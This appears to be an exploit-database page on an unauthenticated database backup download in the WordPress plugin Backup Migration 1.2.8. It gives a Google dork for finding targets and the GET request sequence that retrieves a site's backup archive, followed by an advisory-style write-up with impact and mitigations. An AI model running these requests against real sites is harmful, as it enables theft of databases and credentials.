WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup

Exploit Author: Wadeek Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-05-23 
# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2

1) Get the version of the plugin.

=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------

2) Get the name of the backup directory.

=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
[...],
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
[...],
"OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups.

=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download.

=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip


WordPress Plugin Backup Migration 1.2.8: Unauthenticated Database Backup Vulnerability

Security researchers have uncovered a critical vulnerability in the Backup Migration plugin for WordPress, version 1.2.8, which allows attackers to access sensitive database backups without authentication. This flaw, discovered by security expert Wadeek, exposes the entire WordPress database—potentially including user credentials, posts, and configuration data—via publicly accessible directories.

Overview of the Vulnerability

The Backup Migration plugin, developed by BackupBliss, is designed to automate backups of WordPress installations. However, in version 1.2.8, a misconfiguration in the plugin's file storage and access control mechanisms leads to an unauthenticated database backup exposure.

Attackers can exploit this vulnerability by simply navigating to specific publicly accessible paths within the WordPress installation. No login or authorization is required—making this a particularly dangerous issue for websites with weak security practices.

Exploitation Steps and Technical Details

Here is a step-by-step breakdown of how the vulnerability can be exploited:

  • Step 1: Identify the Plugin Version

    Attackers begin by checking the readme.txt file located at:

    GET /wp-content/plugins/backup-backup/readme.txt

    This file contains the stable tag 1.2.8, confirming the vulnerable version.

  • Step 2: Locate the Backup Directory

    The plugin stores configuration data in config.json, which reveals the backup path:

    GET /wp-content/backup-migration/config.json

    Response:

    {
  "STORAGE::LOCAL::PATH": "/wp-content/backup-migration-xXxXxxXxXx",
  "OTHER:EMAIL": "admin@email.com"
}

    From this, attackers identify the directory name, such as backup-migration-xXxXxxXxXx, which is used to store backups.

  • Step 3: Discover the Backup Archive Name

    By accessing the complete_logs.log file:

    GET /wp-content/backup-migration/complete_logs.log

    Response:

    BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

    This log file reveals the naming pattern of backup archives, including timestamps and unique identifiers.

  • Step 4: Construct the Download Path

    With the directory and archive name known, attackers can directly download the backup:

    GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

    This path is accessible to anyone with internet access, enabling full database extraction.

Real-World Impact and Risks

Consider a typical WordPress site running WordPress 6.2 with the Backup Migration 1.2.8 plugin installed. If the site owner fails to update or remove the plugin, attackers can:

  • Download the complete database backup, including user passwords (if stored in plaintext or weakly hashed).
  • Reconstruct the site’s content, configuration, and user data.
  • Perform credential harvesting or re-deploy the site in a malicious context.
  • Use the backup to conduct targeted attacks, such as phishing or social engineering.

This vulnerability is especially dangerous for small businesses, bloggers, or organizations that rely on WordPress without robust security measures.

Google Dork and Searchability

Security researchers have identified a Google Dork that can be used to locate vulnerable sites:

intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")

Using this query, attackers can quickly identify websites with the vulnerable plugin installed. The presence of an index listing the plugin folder confirms the vulnerability.

Security Recommendations and Mitigation

To protect against this exploit, site administrators must take the following actions:

  • Update or Remove the Plugin: Immediately uninstall or update the Backup Migration plugin to a secure version (if available).
  • Restrict File Access: Ensure that backup directories are not publicly accessible. Use .htaccess or server-level restrictions to deny access to sensitive folders.
  • Implement File Integrity Checks: Monitor for unexpected directories like backup-migration-xXxXxxXxXx and alert on their creation.
  • Use a Secure Backup Strategy: Prefer cloud-based or encrypted backups stored outside the public web root.

Vendor Response and Patch Status

As of May 2023, the vendor BackupBliss has not publicly released a patch for version 1.2.8. The plugin’s official download link remains available, indicating ongoing exposure.

Security experts recommend that users avoid using this plugin until a secure version is released, and instead use trusted alternatives such as UpdraftPlus, BackupBuddy, or WP Time Capsule.

Summary Table: Vulnerability Characteristics

Attribute Value
Plugin Name Backup Migration
Version 1.2.8
Exploit Type Unauthenticated Database Backup Exposure
Attack Vector Publicly accessible file paths
Impact Full database access, credential theft, data compromise
Fix Status Not patched as of May 2023

Organizations relying on WordPress must prioritize plugin security audits. This vulnerability serves as a stark reminder: even well-intentioned tools can become security liabilities if not properly secured.